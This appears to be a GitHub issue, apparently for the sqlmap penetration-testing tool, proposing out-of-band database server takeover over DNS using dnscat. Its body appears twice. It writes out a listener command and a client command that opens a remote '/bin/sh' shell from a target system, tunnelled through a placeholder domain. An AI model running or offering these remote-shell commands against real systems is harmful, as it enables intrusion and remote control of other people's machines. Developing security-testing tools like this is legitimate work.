You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.
Example of string on the authoritative DNS server for tun.yourdomain.org: sudo ./dnscat --listen
Example of string of the client (target system): ./dnscat --domain tun.yourdomain.org --exec "/bin/sh"
Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.
The text was updated successfully, but these errors were encountered:
We have already got OOB database server takeover via TCP (using Metasploit payloads: shell, Meterpreter, VNC), via ICMP (using icmpsh). It is time to implement out-of-band via DNS.
DNS tunneling as a Metasploit shellcode: http://www.skullsecurity.org/blog/?p=611.
Details about dnscat: http://www.skullsecurity.org/wiki/index.php/Dnscat.
Example of string on the authoritative DNS server for
tun.yourdomain.org
:sudo ./dnscat --listen
Example of string of the client (target system):
./dnscat --domain tun.yourdomain.org --exec "/bin/sh"
Type commands on the authoritative DNS server for tun.yourdomain.org where you launched dnscat, they will be executed on the client (target system) and standard output shown inline.
The text was updated successfully, but these errors were encountered: